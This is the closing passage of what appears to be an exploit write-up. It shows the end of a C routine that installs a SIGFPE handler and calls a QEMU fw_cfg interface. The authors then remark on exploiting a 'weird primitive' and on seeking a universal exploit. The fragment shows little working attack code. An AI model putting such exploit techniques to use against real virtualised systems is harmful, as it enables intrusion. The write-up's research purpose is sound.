// ioperm(0, 0xffff, 1);
struct sigaction sa_fpe = {0};
sa_fpe.sa_sigaction = sigfpe_handler;
sa_fpe.sa_flags = SA_SIGINFO;
sigaction(SIGFPE, &sa_fpe, NULL);
fw_cfg();
hlt("finished");
return 0;
}
Final notes
We had lots of fun exploiting this weird primitive! The next step is to find a universal exploit that works without relying on a QEMU-specific hardware interface. If you have any suggestions to improve the exploit, just contact us on Discord or other social media!